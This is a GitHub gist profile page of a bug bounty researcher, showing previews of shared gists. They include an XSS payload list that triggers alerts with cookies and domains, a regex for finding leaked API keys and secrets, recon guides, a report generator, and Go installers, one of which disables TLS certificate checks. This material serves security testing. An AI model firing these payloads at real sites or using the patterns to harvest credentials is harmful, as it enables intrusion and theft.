Skip to content

Instantly share code, notes, and snippets.

View PushkraJ99's full-sized avatar
:shipit:
Security Researcher

PushkraJ PushkraJ99

:shipit:
Security Researcher
39 followers · 128 following
View GitHub Profile
@MU2324
MU2324 / xss1500.txt
Created July 27, 2024 06:58
#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
#javascript:alert(2);
"><svg onload=alert(1)>
[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
[email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
@Huntinex
Huntinex / report.py
Last active September 13, 2024 01:52
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@sidxparab
sidxparab / config.ini
Last active October 17, 2024 14:51
# Copyright © by Jeff Foley 2017-2023. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# SPDX-License-Identifier: Apache-2.0
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
# Would you like to use active techniques that communicate directly with the discovered assets,
# such as pulling TLS certificates from discovered IP addresses and attempting DNS zone transfers?
#mode = active
@isaqueprofeta
isaqueprofeta / siem_training.md
Last active November 11, 2024 16:42
SIEM Training
@h4x0r-dz
h4x0r-dz / Generic keys
Created May 5, 2022 09:15
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@R0X4R
R0X4R / goinstaller.sh
Last active August 1, 2023 08:41
Go language installer for linux and debian systems.
#!/usr/bin/env bash
go_version=$(curl -ks https://golang.org/VERSION?m=text)
red_color="\e[31m"
green_color="\e[32m"
no_color="\e[0m"
type -P go &> /dev/null && echo -e "Current go version is ${green_color}$(go version | awk '{print $3}')${no_color}" || echo -e "${red_color}Go is not installed on your system${no_color}"
echo -e "Downloading latest go into your system - version ${green_color}${go_version}${no_color}"
sudo apt purge --auto-remove golang-go 2> /dev/null &> /dev/null
sudo apt clean &> /dev/null
wget https://dl.google.com/go/${go_version}.linux-amd64.tar.gz -q --no-check-certificate 2> /dev/null
@R0X4R
R0X4R / all-dutch-government.md
Last active November 14, 2024 13:57
Dutch government bug bounty scope. Updates will pushed every month

Dutch Government Bug Bounty Scope

The National Cyber Security Centre (NCSC) contributes to jointly enhancing the resilience of the Dutch society in the digital domain and, in doing so, realizes a safe, open and stable information society by providing insight and offering a perspective for action. Therefore it is essential that the ICT systems of the NCSC are safe. The NCSC strives towards providing a high level of security for its system. However, it can occur that one of these systems has a vulnerability.

For more information about reporting the bugs go to https://english.ncsc.nl/contact/reporting-a-vulnerability-cvd

Source https://gist.github.com/random-robbie/f985ad14fede2c04ac82dd89653f52ad
https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid

@OTaKuHP
OTaKuHP / Bug Bounty Checklist and Cheatsheets.md
Created June 11, 2021 03:42
@sidxparab
sidxparab / Go_installation.txt
Last active August 1, 2023 09:39
Below are steps to install and configure a Go environment
#Download the Go binary
wget https://golang.org/dl/go1.20.4.linux-amd64.tar.gz
#Remove previous golang installation and extract the new one
rm -rf /usr/local/go && tar -C /usr/local -xzf go1.20.4.linux-amd64.tar.gz
#Create symlink
ln -sf /usr/local/go/bin/go /usr/local/bin/
#Add these line to your terminal config file(.bashrc/.zshrc)
@fuckup1337
fuckup1337 / JavascriptRecon.md
Created January 18, 2021 20:02
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)